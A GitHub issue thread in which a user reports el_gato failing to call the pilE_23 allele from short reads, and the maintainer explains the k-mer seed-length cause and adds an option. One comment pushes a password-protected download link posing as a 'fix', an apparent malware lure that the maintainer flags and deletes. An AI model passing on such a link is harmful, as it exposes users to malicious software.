### ISSUE TITLE
pilE allele not found in some isolates

### ISSUE THREAD

**Issue by HilaryESR** [appliedbinf/el_gato#19]
Hi, we have come across a small number of isolates where the pilE_23 allele is not identified when reads are used, but is identified if we use the assembly.  I have mapped the reads myself to the pilE_23 allele and confirmed its there and coverage is good (mean 250). El gato outputs missing data for this allele if the reads are used - any idea why this would be?  I'm happy to share some read sets with you to help troubleshoot (they are too big to upload here). 

We've tested El gato on around 370 isolates and generally it works great - but we have 5 isolates where we see this issue and its always the pilE 23 allele.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Alan-Collins** [comment]
I'm not sure why that would be. Do you have any publicly available data I could take a look at to investigate?

By the way, the comment above looked very suspicious so I deleted it. I wouldn't click the link it contained if you received an email about it.

**Comment by HilaryESR** [comment]
None of our legionella data is publicly available at the moment but I'm happy to send you a couple of anonymized read sets

**Comment by Alan-Collins** [comment]
That would be great! We can use this service if you don't already have a preferred way to share the data https://www.swisstransfer.com/en-us

**Comment by HilaryESR** [comment]
Hi, here's a link where you can download a couple read sets - let me know if it works OK!
[https://www.swisstransfer.com/d/2d66f173-cd9d-4503-9b6f-63299ed3de1e]

The pilE allele was not typed in either of those (shows missing data), but using mompS it types to pilE_23

**Comment by Alan-Collins** [comment]
Hi Hilary,
 
We have identified the issue that resulted in pilE_23 not being called in your samples. It was a combination of factors. pilE_23 has a quite a few SNPs compared to our reference allele, and your samples have reads that were just a bit too short.
 
Specifically, the software used by el_gato to map reads to references of each SBT locus uses a default k-mer length of 21 to identify candidate matches (called seeds). That means that, in order for a read to map, there needs to be a run of 21 consecutive identical bases between read and reference. Your samples failed to be classified because there is a region in _pilE_ that has lots of mismatches. These mismatches do not have 21 bases between them so no read mapping are initialized in that region. This isn’t a problem if you have long enough reads. Either side of the region of _pilE_ with lots of mismatches between pilE_1 and pile_23 are two stretches of identical bases that can seed read mappings. These two seed regions are positions 444-473 and 738-763 in our reference. That means your reads need span the region from each of those seed regions to the middle point between them. That’s 763-444=319 bases. As the average read lengths are < 150bp in the samples you provided, you don’t get sufficient depth in the middle of that 319 base span.
 
We have added a command line option to control the k-mer value used in mapping. This will allow more seeds to be identified and will help with resolving alleles with shorter Illumina reads. We found that a k-mer value of 15 works with the samples you shared.
 
Thanks for submitting this issue and sharing your data. I hope this fix solves the issue with the rest of your samples too!
 
Alan
